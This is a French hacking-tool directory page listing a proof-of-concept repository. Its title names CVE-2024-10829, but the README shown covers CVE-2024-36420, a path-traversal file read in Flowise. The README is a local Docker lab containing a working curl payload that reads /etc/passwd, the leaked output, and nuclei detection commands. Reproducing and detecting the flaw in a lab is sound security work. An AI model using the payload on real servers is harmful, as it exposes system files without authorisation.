Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_CVE-2024-10829 — CVE-2024-10829 analysis | Kitploit
Outils/GitHubGitHub/junn34/poc_cve-2024-10829
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubjunn34/poc_cve-2024-10829

POC_CVE-2024-10829

CVE-2024-10829 analysis

Voir le dépôt
2il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC_CVE-2024-36420

Laboratoire de reproduction locale et brouillon de template nuclei pour CVE-2024-36420 affectant Flowise.

Summary

CVE-2024-36420 est une lecture arbitraire de fichier dans Flowise causée par l'utilisation non assainie du paramètre de corps fileName dans :

  • POST /api/v1/openai-assistants-file

Ce laboratoire a été utilisé pour valider :

  • comportement vulnérable sur flowiseai/flowise:1.4.3
  • comportement refusé sur la version plus récente flowiseai/flowise:3.1.2

References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

Files

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Vulnerable Test

Démarrer Flowise 1.4.3 :

docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Vérification manuelle :

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Réponse vulnérable observée :

HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Newer-Version Control

Démarrer la version plus récente de Flowise 3.1.2 :

docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Vérification manuelle :

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Réponse de la version récente observée :

HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Valider le template :

nuclei -duc -validate -t CVE-2024-36420.yaml

Exécuter contre la cible vulnérable :

nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportement attendu :

  • 1.4.3 : correspondance
  • 3.1.2 : aucune correspondance

Notes

  • L'écart de version est acceptable car ce dépôt ne prétend que le comportement observé :
    • vulnérable sur 1.4.3
    • refusé sur 3.1.2
  • Il ne prétend pas connaître la limite exacte de version corrigée.
  • Aucune cible réelle n'a été utilisée.
Télécharger l’outil